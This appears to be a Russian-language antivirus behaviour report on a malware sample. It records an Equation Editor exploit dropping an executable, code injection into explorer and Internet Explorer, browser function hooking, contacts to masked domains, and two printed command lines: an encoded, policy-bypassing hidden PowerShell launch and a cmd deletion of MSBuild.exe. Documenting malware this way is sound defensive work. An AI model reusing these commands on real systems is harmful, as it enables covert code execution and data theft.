Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '' (загружен из сети Интернет)
Создает и запускает на исполнение (эксплоит)
- 'C:\users\public\69577.exe'
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- iexplore.exe
Перехватывает функции
в браузерах
- Процесс firefox.exe, модуль nss3.dll
- Процесс iexplore.exe, модуль wininet.dll
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\syswow64\autofmt.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\69577.exe
Сетевая активность
Подключается к
- 'bi#.ly':80
- 'th####downtown.com':80
- 'pa##e.ee':443
- 'co######lubconcierges.com':80
TCP
Запросы HTTP GET
- http://www.li#######llifestyleboxes.com/zuwc/?yz#####################################################################################
UDP
- DNS ASK bi#.ly
- DNS ASK th####downtown.com
- DNS ASK pa##e.ee
- DNS ASK bo####bevibesz.com
- DNS ASK co######lubconcierges.com
- DNS ASK li#######llifestyleboxes.com
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAa...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
- '%WINDIR%\syswow64\netstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
